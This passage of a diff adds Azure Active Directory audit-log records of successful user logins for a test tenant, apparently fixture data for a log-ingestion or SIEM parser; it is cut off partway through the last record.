+{"InterSystemsId": "9e0a494b-0db0-4481-a70e-eea6124b7018", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "e48d4214-364e-4731-b2b6-47dabf529218", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000004-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000004-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "e7a84bcf-41ff-4953-8e99-fb1820685f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ac8fcffb-7c44-498d-ad6b-24b85a3a1b59"}
+{"InterSystemsId": "9fc4af4c-bf19-4f88-92ac-0fd029ca21bd", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:36", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "56fa424b-64bd-4ea5-abc4-38256f8a5600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "880fb7bc-5708-42d1-86a8-760c32ac5e6b"}
+{"InterSystemsId": "a35e980b-88be-4343-9691-629473e01983", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "78a2aa65-5026-4124-970a-00e06dc7df00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "30c7afcc-f74d-4b5a-898e-ce72da9386b8"}
+{"InterSystemsId": "a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-06T09:28:00", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "bfe22fb6-c763-4972-91a7-5b13d3d51400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d4f90f07-f5c4-4b36-a81c-6c9bae8660d6"}
+{"InterSystemsId": "aca3d9a3-792d-4357-87c6-ef50c3215baa", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f67a1615-4606-4673-b6fb-68f714fa2200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c"}
+{"InterSystemsId": "ae211253-88cf-4921-9014-2f9beab64fb0", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ccfec0f3-498b-43b1-a4c0-fb42f0fb5300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8ff18278-32ca-49d1-8658-91e577e0854f"}
+{"InterSystemsId": "b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c1ffa732-6576-4f86-9294-44387abc1f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a3939990-f7b4-4dc5-af4d-42b70a9485ea"}
+{"InterSystemsId": "b3ab6d58-7b90-45d6-95e3-ee11333ebc34", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d949d6c2-472e-4901-bd70-96cb90424c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "61ba70f4-bd75-4bc2-a681-2e219d920e63"}
+{"InterSystemsId": "b5c5fd00-b659-413e-8739-6271a4d70506", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:12", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "fabbe34e-a6dd-46f8-805f-4ca633c2ae00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3e17bf8e-92de-45b6-b668-7618ab0e0c95"}
+{"InterSystemsId": "b744259e-13e0-43d7-9f56-82cdbd54cf7c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:06", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ce9f104d-1a1b-488e-9313-b9729e99c400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "f100d714-ffa2-4077-bf90-2f57a3b366c0"}
+{"InterSystemsId": "b7d9a234-9fdd-4e36-9cf3-fd825f22697a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:50", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "67.43.156.12", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "67.43.156.12", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "49092519-a590-4207-b1b3-1d49f9100a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "4b0f0d57-0766-4621-8aa0-04b8d8b63a78"}
+{"InterSystemsId": "bb677f9e-953a-4bde-bb91-0ef8209200a1", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:38", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1da3c318-642f-48dc-836b-e83b27655b00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8d9a1fa8-7b85-4c5d-9e96-5728d572fb95"}
+{"InterSystemsId": "c355f078-53d7-4d60-b836-851a09a98208", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:05", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "20e56367-e902-4200-855b-2ef7b99e5f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "9756fe5b-ea0d-42fa-a665-be8e0eb100e5"}
+{"InterSystemsId": "c5874ff2-7c53-4d51-9252-7abbf0524b1c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "3188aef9-6b4e-44f2-8455-c28b49552200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d"}
+{"InterSystemsId": "cf2168a1-6537-4ed6-80a5-797c3458180c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:25:21", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "23f53edd-63a7-4292-9d80-4fbc49c11e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d137a5e4-7004-493a-acca-5fb167d1f207"}
+{"InterSystemsId": "d21f6867-0670-4c94-b6fa-bde326fcf3c6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:20", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1fa4819f-605a-4ebe-a2c3-bc11c3f8e200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "73f0a2ef-35be-4a71-9545-59d879fc8fb2"}
+{"InterSystemsId": "d5effb7f-9d39-4893-90f6-9cfeec7ed1a7", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f22a3ad7-22e7-4296-a600-e4e9161a6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3783acda-5ded-4d69-95b6-3df5344c0ce0"}
+{"InterSystemsId": "d960e058-1adb-4a84-a65b-1a6ce367e323", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:03", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], 